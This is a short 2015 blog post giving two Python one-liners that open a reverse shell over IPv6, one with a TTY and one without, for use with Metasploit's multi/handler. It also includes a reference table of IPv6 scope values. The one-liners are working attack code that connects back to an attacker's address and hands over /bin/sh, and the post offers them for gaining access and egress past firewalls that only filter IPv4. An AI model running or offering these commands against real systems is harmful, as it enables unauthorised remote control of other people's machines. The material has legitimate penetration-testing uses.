Sunday, February 22, 2015

Python TTY Reverse Shell Over IPv6 One-Liner

Most newer systems come with IPv6 enabled by default, yet many folks continue to forget or are unsure of how to secure IPv6. An admin may create strict rule sets for IPv4, but may neglect to create any for IPv6. This could then be an attack vector to gain access to a system or a method to egress out.

If you find yourself needing to gain a reverse shell with a TTY over IPv6, here is a python one-liner that you can use. This will work with Metasploit's "exploit/multi/handler" module with the "linux/x86/shell/reverse_ipv6_tcp" payload.

There are a few key aspects about connecting over IPv6 with this method that you should also be aware of. You must specify what interface you want to use (even if there is only one) and you must specify the IPv6 Scope Value. The IPv6 Scope Value specifies what type of address you are connecting to. In the example below, we have an IPv6 address that starts with "fe80", which is a link-local address. In this case, the Scope Value would be "2".

Legend:
     = Your IPv6 Connect Back Address
     = The system's network interface to use
     = Port number
     = IPv6 Scope Value


$ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'


If for some reason you wanted a reverse shell without a TTY:

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



IPv6 Scope values
ValueScope nameNotes
0x0reserved
0x1interface-localInterface-local scope spans only a single interface on a node, and is useful only for loopback transmission of multicast.
0x2link-localLink-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes.
0x4admin-localAdmin-local scope is the smallest scope that must be administratively configured, i.e., not automatically derived from physical connectivity or other, non- multicast-related configuration.
0x5site-localLink-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes.
0x8organization-localOrganization-local scope is intended to span multiple sites belonging to a single organization.
0xeglobal
0xfreserved